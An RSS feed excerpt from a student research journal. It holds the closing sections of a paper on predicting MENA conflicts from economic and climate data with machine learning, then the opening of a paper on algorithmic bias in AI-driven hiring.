<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="523" src="https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-1024x523.png" alt="" class="wp-image-4103" srcset="https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-1024x523.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-300x153.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-768x392.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-1536x785.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-1000x511.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-230x117.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-350x179.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-480x245.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM.png 1942w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 1: Two variable line graph that shows the correlation between the average temperature in Celsius of Syria and Sudan and the article features of both regions</figcaption></figure>



<p>The probabilities that were output by the SVC based on article feature values. The article feature values are abstract features of information extracted from the articles. Based on the data presented in Figure 1, an inverse correlation between the two variables is evident. This trend is particularly noticeable from the starting point of the figure through the 2020s. With the exception of early 2023, a significant rise in the average temperature always saw a decrease in the Article Features Value, and vice versa.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="505" src="https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-1024x505.png" alt="" class="wp-image-4108" srcset="https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-1024x505.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-300x148.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-768x379.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-1536x758.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-1000x493.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-230x113.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-350x173.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-480x237.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM.png 1966w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 2: Line Graph which depicts the economic conditions of Syria and Sudan via GDP per Capita in USD and the subsequent conditions of conflict within these two nations</figcaption></figure>



<p>Figure 2 illustrates the relationship between a nation’s economic conditions and its propensity to experience foreign conflicts or civil unrest. The graph tends to show an inverse relationship between the two variables for Syria. Although the graph uses only one feature from the articles and can’t be used to draw definitive conclusions, it is an interesting pattern</p>



<p>In contrast, Sudan demonstrated a somewhat different pattern. Its GDP per capita appeared to be inversely correlated with the article feature value, particularly in the earlier years leading up to 2018. Although the article feature values do not directly correlate with the frequency or severity of a conflict, an increase could still be influenced by the expansion of conflicts, as wars can drive factors that contribute to its growth. The localized nature of the Sudanese conflict in the Darfur region could have influenced this input inconsistency. Taking that into consideration, one reason the article feature value increased could be that before 2018, this conflict primarily affected the Darfur area, while the rest of the country experienced minimal conflict. This regional concentration likely explains why Sudan was generally less impacted by fluctuations in the escalation or de-escalation of conflict. However, in 2018, the conflict significantly expanded, reaching surrounding areas such as Kordofan and Blue Nile, which may explain the country’s increasing vulnerability to these events. After this period, the trend began to align more closely with that of Syria, before witnessing a notable surge in GDP per capita during a phase of reduced conflict around early 2023, greatly surpassing Syria’s economic growth during the same time frame.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="534" src="https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-1024x534.png" alt="" class="wp-image-4105" srcset="https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-1024x534.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-300x157.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-768x401.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-1536x802.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-1000x522.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-230x120.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-350x183.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-480x251.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM.png 1874w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 3: Conflicts throughout the years in the MENA region, sorted into foreign wars and internal conflicts (i.e. coups, civil wars, clashes against terrorist groups)</figcaption></figure>



<p>Figure 3 provides additional context to Figures 1 and 2. It illustrates that the majority of conflicts in the MENA region during the 2010s were civil wars, whereas foreign wars appeared to become more prevalent in the 2020s. While the relationship is not definitive, there seems to be a stronger correlation between the unstable economic conditions in Sudan and Syria and the prevalence of civil wars. Although it is challenging to determine causality, the fluctuating GDP per capita in both countries throughout the 2010s may have contributed to economic instability, potentially triggering civil unrest, coups, and internal conflicts. While it remains difficult to draw firm conclusions, the 2020s appear to be a period of relative economic stability. This, combined with a notable increase in temperatures, may have prompted both nations and their affiliated groups to seek external resources before conditions could escalate further, thus reducing the risk of internal conflict. These factors may help explain the observed decrease in internal conflicts and the corresponding rise in foreign wars.</p>



<h2 class="wp-block-heading">5 Future Work</h2>



<p>Although this prediction model has already made some predictions based on the quantity of data points given to it, some improvements can be implemented to better streamline this process, and show more accurate results. Currently, all data gathered is treated and displayed as one big timeseries, with all events from all different areas of the region and all different time periods being grouped. This makes it harder for the prediction model to make accurate predictions. As importantly, little has been gathered to come to these conclusions, and an increased volume of data could allow for the easier splitting of the time table into smaller episodes, as well as decreased overfitting.</p>



<p>Currently another problem is that the prediction model predicts the probability of events happening on a particular date solely based on information in a preceding sliding window with a binning interval of one week, while disregarding the sliding windows that came before it. The interval the model is currently fixated on may not provide sufficient indications as to conflict, while the previous ones could give more context to help the model predict events. An alternative could be an LSTM or other RNN for this task to allow the model to account for the entire preceding history of the current episode.</p>



<h2 class="wp-block-heading">6 Conclusion</h2>



<p>This paper explored the prediction of wars in the MENA region using statistics and machine learning. It identified causes of war, such as economic and climate factors, and analyzed papers with similar topics. The model used was trained on various climate and economic data points, and predicted outputs with varying degrees of accuracy. In order to obtain more accurate results, more data must be obtained. The successful development of this predictive model has significant implications for conflict prevention efforts. Early prediction of potential conflicts could enable intervention measures that can mitigate their impact or prevent escalation. This could be particularly useful for humanitarian organizations and governments in conflict-prone regions. If more funding and focus were put into this project, accurate results could be achieved, minimizing unrest and conflict, and increasing overall stability in the MENA region.</p>



<h2 class="wp-block-heading">7 Bibliography</h2>



<p>Lindsey, R., &amp; Dahlman, L. (2024, January 18). Climate Change: Global Temperature. Climate.gov; National Oceanic and Atmospheric Administration.https://www.climate.gov/news-features/understanding-climate/climate-change-global-temperature</p>



<p>WMO Climate Normals. (2021, July 8). National Centers for Environmental Information (NCEI). https://www.ncei.noaa.gov/products/wmo-climate-normals</p>



<p>Compilation of Geospatial Data (GIS) for the Mineral Industries and Related Infrastructure of Africa &#8211; ScienceBase-Catalog. (n.d.). Www.sciencebase.gov. <a href="https://www.sciencebase.gov/catalog/item/607611a9d34e018b3201cbbf">https://www.sciencebase.gov/catalog/item/607611a9d34e018b3201cbbf</a></p>



<p>Middle East &amp; North Africa — Data. (n.d.). Data.worldbank.org. https://data.worldbank.org/region/middle-east-and-north-africa?view=chart</p>



<p>World Economic Situation And Prospects: February 2020 Briefing, No. 134 —Department of Economic and Social Affairs. (2020). Un.org. https://www.un.org/development/desa/dpad/publication/world-economic-situation-and-prospects-february-2020-briefing-no-134/</p>



<p>Business In The Middle East: Cultural Differences You Need To Know. (2022, November 2). https://www.milestoneloc.com/business-in-the-middle-east/</p>



<p>Alex. (2015, June 9). Detailed Maps Of The World’s Religions &#8211; Vivid Maps. Vivid Maps. https://vividmaps.com/maps-of-worlds-religions/#google vignette</p>



<p>Poverty headcount ratio at $2.15 a day (2017 PPP) (% of population) &#8211; World —Data. (n.d.). Data.worldbank.org. https://data.worldbank.org/indicator/SI.POV.DDAY?locations=1W&amp;start=1984&amp;view=chart</p>



<p>Data. (2023). Resource Trade. https://resourcetrade.earth/?year=2022&amp; category=164&amp;units=value&amp;autozoom=1</p>



<p>Gu, D. (2019). Population Division Exposure and vulnerability to natural disasters for world’s cities*. https://www.un.org/en/development/desa/population/publications/pdf/technical/TP2019-4.pdf</p>



<p>Herre, B., &amp; Arriagada, P. (2023). The Human Development Index and relatedindices: what they are and what we can learn from them. Our World in Data.https://ourworldindata.org/human-development-index</p>



<p>Burchell, K. (2020). Reporting, Uncertainty, and the Orchestrated Fog of War: A Practice-Based Lens for Understanding Global Media Events. International Journal of Communication. https://ijoc.org/index.php/ijoc/article/viewFile/11205/3102</p>



<p>World Bank. (2024). World Bank Group &#8211; International Development, Poverty and Sustainability. Worldbank.org. https://www.worldbank.org/ext/en/home</p>



<p>IMF. (2024). International Monetary Fund . IMF. https://www.imf.org/en/Home Vision of Humanity — Destination for Peace. (n.d.). Vision of Humanity. https://www.visionofhumanity.org</p>



<p>National and Local Weather Radar, Daily Forecast, Hurricane and information from The Weather Channel and weather.com. (2019, March 7). The Weather Channel. https://weather.com/</p>



<p>Conflict Trends: A Global Overview, 1946–2023 &#8211; World — ReliefWeb. (2024, June 10). Reliefweb.int. https://reliefweb.int/report/world/conflict-trends-global-overview-1946-2023</p>



<p>Archie, A. (2022). World is seeing the greatest number of conflicts since the end of WWII, U.N. says. NPR. https://doi.org/1089884798/united-nations-conflict-covid-19-ukraine-myanmar-sudan-syria-yemen</p>



<p>Thegsaljournal. (2020, February 23). How has warfare changed since WWII? The GSAL Journal. https://thegsaljournal.com/2020/02/23/how-has-warfare-changed-since-wwii/</p>



<p>United Nations. (2020). A New Era of Conflict and Violence. United Nations;United Nations. https://www.un.org/en/un75/new-era-conflict-and-violence</p>



<p>von Einsiedel, S. (2017). Civil War Trends and the Changing Nature of Armed Conflict. United Nations University. https://collections.unu.edu/eserv/UNU:6156/Civil war trends UPDATED.pdf</p>



<p>Mackarov, I. (2015). Statistical look at reasons of involvement in wars. arxiv. https://arxiv.org/pdf/1508.06228</p>



<p>Stewart, F. (2002). Root causes of violent conflict in developing countries .BMJ, 324(7333), 342–345. https://doi.org/10.1136/bmj.324.7333.342</p>



<p>Lemke, D., &amp; Cunningham, D. E. (2009, January 1). Distinctions Without Differences?: Comparing Civil and Interstate Wars. https://www.researchgate.net/publication/228191496 Distinctions Without Differences Comparing Civil and Interstate Wars</p>



<p>Esfandiary, Dina. “The Anxiety Effect: How 9/11 and Its Aftermath Changed Gulf Arab States’ Relations with the U.S.” Www.crisisgroup.org, 15 Sept.112021, www.crisisgroup.org/middle-east-north-africa/gulf-and-arabian-peninsula/united-arab-emirates-united-states-saudi-arabia.</p>



<p>Nirant Kasliwal. “FastEmbed.” Github.io, 2025, qdrant.github.io/fastembed/. Accessed 30 Mar. 2025.</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Albert Liu</h5><p>Albert is a junior at Jordan High School and is interested in data science, computer science, and history. Albert is part of his school&#8217;s Technology Student Association and robotics club, where he and his team have gone on to compete at the state and world levels. He particularly enjoys computer science contests and solving the problems associated with them, ranking Silver in the USACO competitions. </p> <p>Albert wishes to continue finding new solutions to old problems using data, ranging from simple questions, such as the correlation between a house&#8217;s interior and its price, to creating more accurate predictions for larger issues, such as famines, natural disasters, conflicts, and when they may occur.


</p></figure></div>
<p>The post <a href="https://exploratiojournal.com/determining-the-likelihood-of-war-in-a-country-in-the-middle-east-and-north-africa-based-on-economic-and-climate-data-via-machine-learning/">Determining the Likelihood of War in a Country in the Middle East and North Africa Based on Economic and Climate Data via Machine Learning</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Fair or Flawed? How Algorithmic Bias is Redefining Recruitment and Inclusion</title>
		<link>https://exploratiojournal.com/fair-or-flawed-how-algorithmic-bias-is-redefining-recruitment-and-inclusion/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=fair-or-flawed-how-algorithmic-bias-is-redefining-recruitment-and-inclusion</link>
		
		<dc:creator><![CDATA[Sanaa Gada]]></dc:creator>
		<pubDate>Sun, 17 Nov 2024 22:05:48 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<category><![CDATA[Engineering]]></category>
		<category><![CDATA[Social Sciences]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4026</guid>

					<description><![CDATA[<p>Sanaa Gada<br />
Lynbrook High School</p>
<p>The post <a href="https://exploratiojournal.com/fair-or-flawed-how-algorithmic-bias-is-redefining-recruitment-and-inclusion/">Fair or Flawed? How Algorithmic Bias is Redefining Recruitment and Inclusion</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Sanaa Gada<br><strong>Mentor</strong>: Dr. Hong Pan<br><em>Lynbrook High School</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract </h2>



<p>In a world where artificial intelligence is beginning to shape critical life decisions, can we trust that the algorithms guiding these choices are unbiased? This paper investigates the implications of algorithmic bias in hiring processes, emphasizing the dual role of artificial intelligence (AI) as both a transformative tool for recruitment and a potential perpetrator of discrimination. It begins with a review of current hiring practices and then identifies key factors contributing to algorithmic bias, including data quality issues, algorithmic opacity, and the influence of proxy variables. Notable cases where biases have emerged, including Amazon&#8217;s recruitment algorithm, which favored male candidates due to biased training data, are carefully examined. The paper outlines various strategies for mitigating algorithmic bias while acknowledging their limitations, such as data augmentation, vector space correction, and blind hiring. Furthermore, the research extends its analysis beyond hiring, exploring the manifestations of algorithmic bias in facial recognition technology, predictive policing, and healthcare, thus illustrating the broader societal implications. Conclusively, the paper advocates for creating strong frameworks and legislation to promote more openness and responsibility when using algorithms, underscoring society’s moral obligation to ensure technology serves all communities equitably in an increasingly automated world. </p>



<h2 class="wp-block-heading">Key Terms </h2>



<p><span style="text-decoration: underline;">Algorithmic bias</span>:‬‭ systematic and repeatable errors‬‭ in a computer system that create unfair outcomes </p>



<p><span style="text-decoration: underline;">Applicant Tracking System (ATS)</span>:‬‭ a software system‬‭ that helps organizations manage the hiring and recruiting process </p>



<p><span style="text-decoration: underline;">Artificial Intelligence (AI)</span>:‬‭ computer software systems that are capable of performing tasks traditionally associated with human intelligence</p>



<p><span style="text-decoration: underline;">Proxy Variables</span>:‬‭ a variable that serves as a substitute‬‭ for the variable of interest that cannot be measured directly </p>



<p><span style="text-decoration: underline;">Target Variable:‬‭</span> a feature of a dataset needing to‬‭ be understood more clearly </p>



<h2 class="wp-block-heading">1. Introduction </h2>



<p>Today’s businesses focus more on finding the right employees to maintain their competitive edge. To achieve this, many companies are turning to artificial intelligence (AI) embedded within applicant tracking systems (see Key Terms) to streamline hiring processes, enhance efficiency, and reduce workloads. However, while AI offers significant advantages, it can also unintentionally perpetuate discrimination in hiring. This occurs when biased algorithms or data lead to unfair treatment of certain candidates (see Figure 1). Resources like the Implicit Association Test, available at‬‭ https://implicit.harvard.edu/implicit/takeatest.html,‬‭ can be valuable tools to help individuals recognize and explore their biases. Understanding the causes of discrimination in hiring is not just crucial; it&#8217;s a responsibility we all share for developing fairer and more inclusive employment practices. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="896" height="552" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM.png" alt="" class="wp-image-4028" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM.png 896w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM-300x185.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM-768x473.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM-230x142.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM-350x216.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM-480x296.png 480w" sizes="(max-width: 896px) 100vw, 896px" /><figcaption class="wp-element-caption">Figure 1:‬‭ A pie chart displaying the various causes‬‭ of discrimination in the hiring process, highlighting how algorithmic bias, characterized by systematic and repeatable errors, significantly contributes to inequality techniques in hiring. Hiring discrimination prevents minority groups from accessing fair job opportunities and limits career growth (Albaroudi et al., A, 2024). </figcaption></figure>



<p>This paper will first explore the current job hiring process, some of the key issues that lead to algorithmic bias in the status quo, and real-world examples of hiring bias. Possible solutions to mitigating these biases will also be evaluated, acknowledging current limitations but highlighting ongoing advancements and future potential. Finally, general applications of algorithmic decision-making across various fields will be explored, demonstrating the breadth of these tools and the significance of addressing biases to create a fairer, more inclusive future for all. </p>



<h2 class="wp-block-heading">2. Navigating AI-Driven Hiring </h2>



<h4 class="wp-block-heading">2.1 Applicant Tracking Systems </h4>



<p>Applicant tracking systems, otherwise known as ATS, have become increasingly common in hiring practices. Websites embed this software system to help recruiters filter candidates throughout the hiring process, improving applicant sourcing. When candidates apply to a job posting by sharing their resumes, an ATS will scan candidates based on qualifying questions that satisfy the company’s standards (see Figure 2). AI plays a crucial role in this process, scanning resumes based on specific parameters regarding skills, qualifications, experiences, etc. It takes over the tedious human task of shortlisting candidate resumes, but algorithms may have encoded societal stereotypes found in the data they were trained with‬‭ (Frissen et al., 2023)‬‭ . </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="512" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-1024x512.png" alt="" class="wp-image-4029" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-1024x512.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-300x150.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-768x384.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-1000x500.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-230x115.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-350x175.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-480x240.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM.png 1344w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 2:‬‭ Applicant tracking systems are used to parse‬‭ resumes after candidates apply, removing unqualified applicants by scanning for relevant keywords and matching qualifications. These algorithms are becoming an integral part of modern hiring processes, helping companies efficiently manage large volumes of applications and improve the overall recruitment workflow (Sen, 2023‬‭ ). </figcaption></figure>



<h4 class="wp-block-heading">2.2 Three Factors Contributing to Algorithmic Bias </h4>



<p>Algorithmic bias is shaped by several key factors, beginning with data quality issues. These issues arise when the training data used to develop algorithms is biased, incomplete, or reflective of historical inequalities. For instance, if data is collected from an organization that has historically disproportionately hired more white employees than Black employees, the algorithm might associate good performance with being white. This does not mean that hiring only Black employees would fix the bias; instead, it&#8217;s crucial to improve the diversity and balance of the data to reduce the bias. The urgency of this need cannot be overstated. Proxy variables (see Key Terms) can also embed systemic biases within algorithms even when direct indicators of discrimination, such as race and gender, are not explicitly included. For example, zip code can be a proxy variable for race because it strongly correlates with neighborhood segregation‬‭ (Fountain, 2022)‬‭ .</p>



<p>Another significant factor contributing to algorithmic bias is algorithmic opacity.‬‭ This term refers to the potential lack of understanding of an algorithm due to its complexity. Often, the lack of transparency in an algorithm makes it hard for human users to interpret its internal processes (Sadek et al., 2024)‬‭ . Many algorithms operate as “black boxes,” meaning their decision-making processes are not easily understandable or interpretable by those affected by their outcomes. If the logic behind decisions is unclear, it becomes challenging to identify or correct biases, ensure fairness, or hold the creators accountable for discriminatory outcomes. </p>



<p>Algorithms also rely on correlating variables with a target variable (see Key Terms) to predict outcomes.‬‭ For example, if a tech company was looking to hire a software developer proficient in a specific programming language such as Python, the target variable could be &#8220;proficiency in Python.&#8221; The recruitment algorithm would then categorize candidates into groups based on their coding skills, such as &#8220;expert in Python,&#8221; &#8220;basic Python knowledge,&#8221; &#8220;no Python experience,&#8221; etc. This allows the company to narrow the pool of candidates to those who match the technical expertise required for the job. </p>



<p>However, a key problem with target variables is how the output is defined will influence the result. For example, suppose non-technical skills (soft skills) are considered important for an organization and are part of the target variable. In that case, women may gain an advantage compared to algorithms that do not consider such skills. Additionally, the measure of employees’ performance is also based on the subjective assessment by their managers. Factors such as the employee-manager relationship, personal biases, or differing expectations within the team environment can contribute to the algorithmic evaluation. As a result, algorithms trained on this data may unintentionally reflect biases present in the workplace, resulting in unfair outcomes where high-performing individuals who may fit the requirements might be overlooked or undervalued by the algorithm. </p>



<h4 class="wp-block-heading">2.3 Current Hiring Practices </h4>



<p>AI has played a growing role in hiring and transforming how companies identify, evaluate, and recruit talents.‬‭ Early AI-driven hiring systems were‬‭ used to make the hiring process more efficient but lacked sophisticated methodologies. For example, Resumix was founded in 1988 and served as a resume parsing tool. ATS made its debut in the 1990s with job posting sites such as CareerBuild. By the early 2000s, talent assessment tools like eSkill and SkillSurvey used AI to automate pre-employment testing and background/skill checks. The 2010s saw the rise of AI-powered video interviewing software, with platforms like HireVue utilizing machine learning algorithms. Natural language processing (NLP), a subfield of AI that uses machine learning to understand spoken and written human language, is used to analyze speech patterns, word choice, and language structure during video interviews to assess candidates. Sentiment analysis provides insights into candidates’ emotions and engagement, adding another layer to talent evaluation. </p>



<p>However, AI’s integration into hiring has led to concerns about bias. A Microsoft research study in 2019 highlighted significant biases with AI algorithms embedded in the data on which they are trained. Researchers found that language models like Word2Vec, a machine learning technique that uses NLP to obtain vector representations of words, could produce biased associations between specific demographic groups and stereotypical terms. For example, their investigation led them to observe outputs such as a man is to a woman as a computer programmer is to a homemaker‬‭ (Chiu, n.d.)‬‭ . These biases pose risks in applications like resume screening, where hidden associations could unintentionally favor or disadvantage certain groups. </p>



<p>In 2018, Amazon’s AI-driven algorithm was also found to be biased. When AI systems are trained on historical data, they often reflect the existing biases within that data. If a company’s past hiring practices were skewed, those biases could be unintentionally embedded in the AI’s decision-making process. When Amazon attempted to automate its recruitment process in 2018, it used an algorithm trained on the previous 10 years of resumes. The dataset of resumes consisted primarily of male applicants over ten years, causing the algorithm to favor male language patterns and resulting in discrimination against female candidates‬‭ (Dastin, 2022)‬‭ . Words such as “executed” and “captured” were commonly found on male engineers’ resumes and were more favored by the technology. The system also downgraded resumes that featured the word &#8220;women&#8217;s,&#8221; such as in &#8220;women&#8217;s chess club captain.&#8221; This example highlights the potential risks of relying on AI in hiring, as biased training data can perpetuate discrimination and undermine diversity efforts. </p>



<figure class="wp-block-image aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="868" height="486" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM.png" alt="" class="wp-image-4030" style="width:548px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM.png 868w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM-300x168.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM-768x430.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM-230x129.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM-350x196.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM-480x269.png 480w" sizes="(max-width: 868px) 100vw, 868px" /><figcaption class="wp-element-caption">Figure 3:‬‭ Different applications of AI in job hiring. The most common usages of AI are talent sourcing, such as career websites and candidate outreach, and candidate screening, which includes resume scanning and identifying skills that match the job description (The Ultimate Guide to AI in Recruiting, 2024). </figcaption></figure>



<p>While Amazon&#8217;s algorithm faced scrutiny for discriminating against women, it also prompted broader questions about how personal data is utilized in hiring. Companies increasingly rely on AI algorithms to sift through resumes, assess candidates, and predict job performance (see Figure 3). This reliance raises crucial considerations regarding the transparency and accountability of data usage in recruitment processes. Globally, regulatory approaches to AI in hiring are evolving. The European Union has taken the lead in establishing AI policy with its AI Act, which aims to ensure that AI hiring systems follow strict privacy rules. It mandates transparency in AI decision-making and imposes requirements for assessing the impact of AI on employment outcomes‬‭ (Sadek et al., 2024)‬‭ . </p>



<p>In the U.S., the rules for AI are less organized and vary from place to place. With general agreement that there need to be AI policies, the question becomes who will make the rules? A commonly shared point of view is that frameworks must ensure that company technologies do not cause harm and that they are held accountable for their impacts. Furthermore, policies need to advocate for greater transparency, including how AI systems work and the data they use. Actors in the AI space must adopt principles that promote responsible AI use, as articulated in the White House’s Blueprint for an AI Bill of Rights‬‭ (‬‭ The Three Challenges of AI Regulation‬‭ , n.d.)‬‭ . </p>



<p>As AI technology advances, the need for coherent frameworks will become increasingly important to ensure fairness and accountability in employment practices. </p>



<h2 class="wp-block-heading">3. Solutions and Limitations of Mitigating Algorithmic Bias in Hiring </h2>



<p>As algorithms play a more significant role in hiring, techniques like data augmentation, vector space correction, and blind hiring offer valuable ways to enhance fairness and inclusivity (see Figure 4). While each method brings its own limitations, they represent significant strides toward reducing bias in AI-driven recruitment. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="530" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-1024x530.png" alt="" class="wp-image-4031" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-1024x530.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-300x155.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-768x398.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-1000x518.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-230x119.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-350x181.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-480x249.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM.png 1240w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 4:‬‭ An overview of three possible solutions‬‭ to mitigating algorithmic bias. Data augmentation expands the training data by incorporating diverse examples to reduce bias and improve model fairness. See Figure 5 for an in-depth model of augmentation for text-based data. Vector space correction adjusts how data points are represented in a multi-dimensional space by positioning them more fairly in relation to biased concepts, helping to equalize their influence in the model. Blind hiring removes identifiable information like names or genders from applications to prevent unconscious biases during recruitment. </figcaption></figure>



<h4 class="wp-block-heading">3.1 Data Augmentation </h4>



